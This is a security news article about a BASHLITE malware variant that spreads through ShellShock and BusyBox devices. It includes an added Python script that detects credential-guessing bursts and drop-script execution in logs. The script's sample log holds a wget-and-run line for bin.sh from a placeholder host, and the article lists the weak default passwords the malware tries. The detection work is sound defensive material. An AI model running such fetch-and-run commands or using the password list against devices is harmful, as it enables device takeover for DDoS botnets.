A new variant of the BASHLITE malware exploiting the ShellShock vulnerability was used by cyber criminals to infect devices that use BusyBox software.
A new strain of the BASHLITE malware was detected by experts at Trend Micro shortly after the public disclosure of the ShellShock bug.
The malware, named ELF_BASHLITE.A (ELF_FLOODER.W), includes the payload of the ShellShock exploit code and has been used by threat actors to run distributed denial-of-service (DDoS) attacks.
The new variant of ELF_BASHLITE.A is able to infect devices running BusyBox, software that bundles many Unix utilities into a single executable. BusyBox is designed for embedded operating systems; many routers and other network appliances run it to simplify maintenance.
“We observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scan the network for devices/machines running on BusyBox, and log in using a set of usernames and passwords (see figure 4 below). Once a connection is established, it runs the command to download and run bin.sh and bin2.sh scripts, gaining control over the Busybox system,” Rhena Inocencio, threat response engineer at Trend Micro, wrote in a blog post.
The new variant of the BASHLITE malware is able to identify systems running BusyBox software and hijack them. The attack scenario is very simple: the malicious code first scans the network for the application and then attempts to log in using a set of credentials from a predefined dictionary. The list of passwords includes “root,” “admin,” “12345,” “pass,” “password” and “123456.”
Once the malware has gained access, it runs a command to download and execute two scripts, bin.sh and bin2.sh, giving it control over the BusyBox system.
“Once a connection is established, it runs the command to download and run bin.sh and bin2.sh scripts, gaining control over the Busybox system. BusyBox is built on top of the Linux kernel and used by small devices such as routers. Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive.”
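The scan, credential-guessing and drop-script sequence described above can be watched for from the device or syslog side. The following Python script is an added example, not code from the article or from Trend Micro: it assumes a constructed one-event-per-line login/command log (the line format, the sample lines and the 198.51.100.7, 192.0.2.20 and 203.0.113.9 addresses are made up for the example, and real BusyBox telnetd syslog output would need its own regex) and raises alerts for a burst of failed logins from one source, a successful login from that source afterwards, and a subsequent fetch or execution of bin.sh or bin2.sh in that session.

```python
"""Detection sketch for the BASHLITE/BusyBox credential-guessing scenario.

The log format below is CONSTRUCTED for this example (one event per line);
real BusyBox/telnetd syslog lines look different and need their own regex.
Attempted passwords are deliberately not logged, so guessing is detected
by failure rate, not by matching the malware's password list.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Script names the article reports the malware fetching and executing.
DROPPED_SCRIPTS = ("bin.sh", "bin2.sh")
# Typical fetch/execute tools on a BusyBox system, used to reduce false hits.
FETCH_OR_RUN = ("wget", "tftp", "curl", "sh ")

# Constructed line formats:
#   <ISO-8601 ts> login <OK|FAIL> user=<name> src=<ip>
#   <ISO-8601 ts> cmd src=<ip> <command line as typed on the shell>
LOGIN_RE = re.compile(
    r"^(?P<ts>\S+) login (?P<res>OK|FAIL) user=(?P<user>\S+) src=(?P<ip>\S+)$")
CMD_RE = re.compile(r"^(?P<ts>\S+) cmd src=(?P<ip>\S+) (?P<cmd>.+)$")


def parse_line(line):
    """Return an event dict for a recognised line, or None for anything else."""
    m = LOGIN_RE.match(line)
    if m:
        return {"kind": "login", "ts": datetime.fromisoformat(m["ts"]),
                "res": m["res"], "user": m["user"], "ip": m["ip"]}
    m = CMD_RE.match(line)
    if m:
        return {"kind": "cmd", "ts": datetime.fromisoformat(m["ts"]),
                "ip": m["ip"], "cmd": m["cmd"]}
    return None


def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Scan log lines in order and return a list of (alert, source_ip) tuples.

    guessing_burst           - `threshold` failed logins from one source inside `window`
    login_after_guessing     - a successful login from a source that produced a burst
    dropped_script_execution - bin.sh / bin2.sh fetched or run from such a session
    """
    alerts = []
    failures = defaultdict(list)   # src ip -> timestamps of recent failed logins
    bursting = set()               # sources that crossed the failure threshold
    compromised = set()            # sources that logged in after a burst
    for line in lines:
        ev = parse_line(line.strip())
        if ev is None:
            continue
        if ev["kind"] == "login":
            if ev["res"] == "FAIL":
                recent = failures[ev["ip"]]
                recent.append(ev["ts"])
                # Keep only failures inside the sliding window.
                while recent and ev["ts"] - recent[0] > window:
                    recent.pop(0)
                if len(recent) >= threshold and ev["ip"] not in bursting:
                    bursting.add(ev["ip"])
                    alerts.append(("guessing_burst", ev["ip"]))
            elif ev["ip"] in bursting:
                compromised.add(ev["ip"])
                alerts.append(("login_after_guessing", ev["ip"]))
        else:  # shell command from an interactive session
            cmd = ev["cmd"]
            if (ev["ip"] in compromised
                    and any(s in cmd for s in DROPPED_SCRIPTS)
                    and any(t in cmd for t in FETCH_OR_RUN)):
                alerts.append(("dropped_script_execution", ev["ip"]))
    return alerts


# Constructed sample: five rapid failures, a success, then the drop script;
# followed by a legitimate operator session that must not alert.
SAMPLE_LOG = """\
2014-11-10T08:00:01 login FAIL user=root src=198.51.100.7
2014-11-10T08:00:02 login FAIL user=root src=198.51.100.7
2014-11-10T08:00:03 login FAIL user=root src=198.51.100.7
2014-11-10T08:00:04 login FAIL user=admin src=198.51.100.7
2014-11-10T08:00:05 login FAIL user=admin src=198.51.100.7
2014-11-10T08:00:06 login OK user=root src=198.51.100.7
2014-11-10T08:00:07 cmd src=198.51.100.7 wget http://203.0.113.9/bin.sh -O /tmp/bin.sh; sh /tmp/bin.sh
2014-11-10T08:05:00 login OK user=operator src=192.0.2.20
2014-11-10T08:05:10 cmd src=192.0.2.20 cat /proc/version
"""

if __name__ == "__main__":
    for alert, ip in detect(SAMPLE_LOG.splitlines()):
        print(f"{alert}: {ip}")
```

The sliding window keeps the rule cheap enough to run on a syslog collector in front of many small devices; the third alert is the one worth paging on, since it only fires once a guessed session actually pulls one of the named scripts.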
Trend Micro invites administrators to change the default settings on their network devices and to disable remote shell access, if possible, to prevent exploitation.
In October, experts at Malware Must Die detected numerous attacks worldwide exploiting the Bash Bug (ShellShock) flaw to spread the Mayhem botnet.
The experts maintain that attacks using the exploit could top 1 billion in a short time; for this reason major IT firms started releasing software updates to patch their products and prevent exploitation of the ShellShock flaw.
Unfortunately, many factors can hinder patching, and many systems remain vulnerable to this kind of attack.
The most recent high-profile victim was BrowserStack, the cross-browser testing service: one of its servers was compromised via a ShellShock exploit that allowed attackers to access customer data.
Pierluigi Paganini is a member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and the Cyber G7 Group; he is also a Security Evangelist, Security Analyst and Freelance Writer.
Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years' experience in the field and a Certified Ethical Hacker (EC-Council, London). A passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to found the security blog "Security Affairs", recently named a Top National Security Resource for the US.
Pierluigi is a member of "The Hacker News" team and writes for major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and many other security magazines.
He is the author of the books "The Deep Dark Web" and "Digital Virtual Currency and Bitcoin".